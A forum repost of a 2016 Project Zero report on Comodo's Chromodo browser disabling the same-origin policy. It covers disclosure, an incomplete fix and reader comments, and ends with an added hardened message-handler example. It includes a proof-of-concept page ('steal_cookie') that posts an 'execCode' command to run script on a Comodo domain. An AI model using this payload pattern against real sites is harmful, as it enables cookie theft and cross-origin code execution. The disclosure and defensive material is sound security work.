From WidlbyDesign https://www.wilderssecurity.com/thre...ore-release-cicles.382607/page-3#post-2561395

Note that this was marked closed because Comodo said they fixed it, but it wasn't really fixed, so a new issue #713 was opened. I can't get to that issue though; if someone else can, post it here. There are also other open issues mentioned for C Dragon.

Tavis Ormandy @taviso, 3 hours ago
Selling antivirus doesn't qualify you to fork chromium, you're going to screw it up.

https://code.google.com/p/google-security-research/issues/detail?id=704

When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc. are imported from Chrome. They also hijack DNS settings, among other shady practices.

https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php

Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that, they ***disable the same origin policy***.... ?!?..

To reproduce, do something like this:

    <html>
    <head></head>
    <body>
    <script>
    function steal_cookie(obj) {
        // Wait for the page to load
        setTimeout(function() {
            obj.postMessage(JSON.stringify({
                command: "execCode",
                code: "alert(document.cookie)",
            }), "*");
        }, 2000);
    }
    </script>
    <a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
    </body>
    </html>

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachment: Windows 7 x86-2016-01-21-16-48-44.png (258 KB)

Jan 25, 2016
Project Member #1 tav...@google.com
I've attached a working exploit for this issue. I haven't received an acknowledgement or response from Comodo, so I sent this reply:

FYI, I still haven't got a response.

The same origin policy is basically disabled for all of your customers, which means there is no security on the web....this is about as bad as it gets. If the impact isn't clear to you, please let me know. This vulnerability is bad enough to start paging people.

Attachment: exploit.html (1.3 KB)

Jan 29 (4 days ago)
Project Member #2 tav...@google.com
Comodo replied that they're planning a hotfix for this issue within a day, but the other open issues may take weeks to fix. I replied that I noticed their scan process is not using ASLR, which probably isn't a good sign going forward, and I'm planning to start a more thorough audit next week.

Today (2 hours ago)
Project Member #5 tav...@google.com
It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit. This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue. The deleted comments above contained discussion about the bypass; I'll move them into a new issue.

Project Member #6 tav...@google.com
Discussion about the incorrect fix is in issue 713.

Today (2 hours ago)
Project Member #7 tav...@google.com
(No comment was entered for this change.)
Blocking: google-security-research:713

Today (2 hours ago)
#8 kobrasre...@gmail.com
"After "discussion" with Comodo (I can't really get any response from them, but I'm trying)"
Hopefully this being posted on HackerNews will help. If not, rampant exploitation of Comodo browsers ought to incentivize companies to cancel their subscriptions and Comodo will lose money.

Today (62 minutes ago)
#9 l33t...@gmail.com
toppest of keks, my friend.

There's plenty of evidence of the shadiness of Chromodo; it gets pushed via the kind of PUP bundler networks that also push winlocker trojans of Indian origin.

Today (59 minutes ago)
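Added example, not code from the quoted tracker report or from Comodo: the root cause in the report is a window "message" handler that acts on a JSON command from any sender, which is why a page on another origin can post {command: "execCode"} at a Comodo page. The handlers below contrast that shape with one that checks event.origin and only dispatches a fixed set of harmless commands; the allowlisted origin, command names and the attacker origin are assumed or constructed for illustration.

```javascript
// Added example (not Comodo's extension code): a "message" handler that trusts
// every sender vs. one that validates origin and dispatches only known commands.
// TRUSTED_ORIGINS / ALLOWED_COMMANDS are assumed values, not Comodo's.

const TRUSTED_ORIGINS = new Set(["https://ssl.comodo.com"]); // assumed allowlist
const ALLOWED_COMMANDS = new Set(["ping", "getVersion"]);    // assumed safe commands

// Vulnerable shape: no origin check, and a command that runs caller-supplied code
// in the page's context. runCode is injected so this demo records instead of evaluating.
function vulnerableHandler(event, runCode) {
  const msg = JSON.parse(event.data);
  if (msg.command === "execCode") {
    return { accepted: true, result: runCode(msg.code) };
  }
  return { accepted: false, reason: "unknown command" };
}

// Hardened shape: drop anything not from an allowlisted origin, parse defensively,
// and never expose a "run this string" command at all.
function hardenedHandler(event) {
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    return { accepted: false, reason: "untrusted origin" };
  }
  let msg;
  try {
    msg = JSON.parse(event.data);
  } catch (_err) {
    return { accepted: false, reason: "malformed message" };
  }
  if (msg === null || typeof msg !== "object" || !ALLOWED_COMMANDS.has(msg.command)) {
    return { accepted: false, reason: "unknown command" };
  }
  return { accepted: true, command: msg.command };
}

// Constructed stand-in for the MessageEvent a cross-origin page produces with
// postMessage(JSON.stringify({command: "execCode", code: "..."}), "*").
function crossOriginExecCodeEvent() {
  return {
    origin: "https://attacker.example", // constructed, not a real site
    data: JSON.stringify({ command: "execCode", code: "alert(document.cookie)" }),
  };
}

// In a browser the hardened handler is wired up as:
//   window.addEventListener("message", (e) => hardenedHandler(e));
```

The same check applies to `chrome.runtime.onMessageExternal` listeners in an extension: validate `sender.origin` or `sender.id` before dispatching.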